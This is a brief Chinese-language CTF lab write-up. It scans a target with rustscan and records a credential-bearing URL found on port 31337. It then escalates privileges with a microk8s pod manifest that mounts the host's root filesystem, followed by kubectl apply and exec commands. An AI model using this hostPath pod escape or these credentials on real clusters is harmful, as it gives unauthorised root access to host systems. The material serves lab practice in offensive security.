Frank {{title}} Herby make an app

rustscan -a 10.10.244.90 --ulimit 5000

先扫

Scanned at 2024-03-08 15:53:12 CST for 0s

PORT      STATE SERVICE      REASON
22/tcp    open  ssh          syn-ack ttl 60
3000/tcp  open  ppp          syn-ack ttl 60
10250/tcp open  unknown      syn-ack ttl 60
10255/tcp open  unknown      syn-ack ttl 60
10257/tcp open  unknown      syn-ack ttl 60
10259/tcp open  unknown      syn-ack ttl 60
16443/tcp open  unknown      syn-ack ttl 60
25000/tcp open  icl-twobase1 syn-ack ttl 60
31337/tcp open  Elite        syn-ack ttl 59
32000/tcp open  unknown      syn-ack ttl 59

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.94 seconds
           Raw packets sent: 14 (592B) | Rcvd: 11 (480B)

rustscan -a 10.10.244.90 -- -sV -sC --ulimit 5000

爆破,31337端口有个文件,访问下载是
http://frank:f@an3-1s-E337!!@192.168.100.50

apiVersion: v1
kind: Pod
metadata:
  name: priv-esc
spec:
  containers:
  - name: shell
    image: localhost:32000/bsnginx
    command:
      - "/bin/bash"
      - "-c"
      - "sleep 10000"
    volumeMounts:
      - name: root
        mountPath: /mnt/root
  volumes:
  - name: root
    hostPath:
      path: /
      type: Directory

microk8s kubectl apply -f a.yaml

microk8s kubectl exec -it priv-esc -- /bin/bash

感觉和docker一个样啊,先启动一个pod,然后挂载